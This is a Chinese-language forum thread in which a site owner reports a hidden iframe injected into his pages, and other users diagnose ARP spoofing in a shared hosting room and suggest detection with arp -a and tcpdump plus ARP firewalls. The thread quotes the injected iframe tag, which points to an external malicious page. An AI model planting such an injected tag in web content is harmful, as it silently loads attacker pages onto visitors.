网站被截持了

xsun17951

网站的页面被挂了一个iframe.

"<iframe src=http://www.uhbaidu.com/photo/qing.htm width=100 height=0></iframe>"

刚出现的，因为之前客户端查看源码没有这个iframe。以为中毒了，查看服务器端的文件，一切正常，也没有看到这个iframe。
网站是apache+tomcat。

现在搞得网站的某些页面输出不完整。

这个是啥病毒？

net_robber

不一定，很有可能是同一机房的其他机器中了Arp，我前几天遇到过

power328

不是你网站被劫持了，是你自己的机器中arp病毒了

txnet

原帖由 net_robber 于 2008-1-18 10:12 发表
不一定，很有可能是同一机房的其他机器中了Arp，我前几天遇到过

我也遇过这样地！哈哈！

wwww1221

急啊！！！！我们这儿现在就是这种情况！！！哪位老大知道怎么解决这个问题！

xsun17951

原帖由 net_robber 于 2008-1-16 13:16 发表
不一定，很有可能是同一机房的其他机器中了Arp，我前几天遇到过

是啊，机器在托管机房，可能是别的机器的。大约一个小时后又好了。估计是机房那边发现并采取了措施。

snwxf

我的机器也出现了此问题，如何知道是不是我的服务器出现了arp病毒？

imhr

解决就好

智勇双全

判断被插入的代码在您页面头还是页面内就可以判断问题的所在了，如果通过查看源文件，看到在头被插入恶意代码说明您所在的网段出现arp攻击的现象通过arp -a等核对mac地址再tcpdump -nnnv arp 扫描出来结果可以查出发出攻击包的源IP。对他断网即可。通常这类操作机房会很快判断出来的。所以很快就恢复啦。

wwww1221

楼上说的正确！补充一下：一时半会找不到中了arp病毒服务器的话，可以先在受影响的服务器上安装一个arp防火墙，因为我们的是windows2003的服务器，所以就装了个360的arp防火墙，装上防火墙的服务器就会恢复正常。找到中病毒的服务器后把它断网，整个网络就会恢复正常了。